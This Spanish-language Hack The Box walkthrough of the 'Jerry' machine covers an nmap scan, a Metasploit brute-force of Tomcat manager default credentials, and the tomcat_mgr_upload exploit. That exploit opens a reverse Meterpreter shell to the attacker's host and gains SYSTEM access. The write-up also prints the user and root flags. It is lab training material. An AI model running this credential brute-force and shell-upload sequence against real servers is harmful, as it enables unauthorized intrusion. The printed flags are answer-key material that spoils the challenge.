__ _____ _____ _____ _ _____ | | | _ | ___| _ |___| | |_|_ _|___ | |__| | | _| |_ -| | | | | | .'| |_____|__|__| |___|__|__|___|__|__|_| |_| |__,| hola@lacashita.com

[HTB] Jerry

Hoy vamos a hackear la maquina de HTB llamada Jerry. Esta catalogada como facil.

Enumeration

sml@m0nikE:~/ctf/htb/machines/jerry$ sudo nmap -A -p- -sS 10.10.10.95 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 21:04 CET Nmap scan report for 10.10.10.95 Host is up (0.041s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 8080/tcp) HOP RTT ADDRESS 1 41.26 ms 10.10.14.1 2 43.46 ms 10.10.10.95 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 123.82 seconds

Vemos que usa Apache Tomcat asi que vamos a usar metasploit para ver si podemos hacer bruteforce y obtener los credenciales. Para ello usamos el modulo de auxiliary/scanner/http/tomcat_mgr_login y usamos como diccionario el que viene por defecto.

Bruteforce Tomcat

msf5 > use auxiliary/scanner/http/tomcat_mgr_login msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options Module options (auxiliary/scanner/http/tomcat_mgr_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The HTTP password to specify for authentication PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no The HTTP username to specify for authentication USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95 rhosts => 10.10.10.95 msf5 auxiliary(scanner/http/tomcat_mgr_login) > run [!] No active DB -- Credential data will not be saved! [-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect) [+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret [-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect) [-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Obtenemos los credenciales: [+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret Con los credenciales podemos usar el exploit exploit/multi/http/tomcat_mgr_upload para ver si podemos conseguir una shell.

Exploitation

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload msf5 exploit(multi/http/tomcat_mgr_upload) > show options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Java Universal msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.10.95 rhosts => 10.10.10.95 msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret httppassword => s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat httpusername => tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080 rport => 8080 msf5 exploit(multi/http/tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 10.10.14.29:4444 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying Si6Mp3gsdJ... [*] Executing Si6Mp3gsdJ... [*] Undeploying Si6Mp3gsdJ ... [*] Sending stage (53906 bytes) to 10.10.10.95 [*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.95:49192) at 2019-12-05 21:07:31 +0100 meterpreter > meterpreter > getuid Server username: JERRY$

Bien, tenemos una shell. Vamos a ver que privilegios tenemos y obtener los flags.

user.txt and root.txt

meterpreter > shell Process 2 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88>cd .. cd .. C:\>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\ 06/19/2018 03:07 AM apache-tomcat-7.0.88 08/22/2013 05:52 PM PerfLogs 06/19/2018 05:42 PM Program Files 06/19/2018 05:42 PM Program Files (x86) 06/18/2018 10:31 PM Users 06/19/2018 05:54 PM Windows 0 File(s) 0 bytes 6 Dir(s) 27,631,341,568 bytes free C:\>cd users cd users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users 06/18/2018 10:31 PM . 06/18/2018 10:31 PM .. 06/18/2018 10:31 PM Administrator 08/22/2013 05:39 PM Public 0 File(s) 0 bytes 4 Dir(s) 27,631,341,568 bytes free C:\Users>cd administrator cd administrator C:\Users\Administrator>cd desktop cd desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop 06/19/2018 06:09 AM . 06/19/2018 06:09 AM .. 06/19/2018 06:09 AM flags 0 File(s) 0 bytes 3 Dir(s) 27,631,341,568 bytes free C:\Users\Administrator\Desktop>cd flags cd flags C:\Users\Administrator\Desktop\flags>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop\flags 06/19/2018 06:09 AM . 06/19/2018 06:09 AM .. 06/19/2018 06:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,631,271,936 bytes free C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" type "2 for the price of 1.txt" user.txt 7004dbcef0f854e0fb401875f26ebd00 root.txt 04a8b36e1545a455393d067e772fe90e C:\Users\Administrator\Desktop\flags>

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".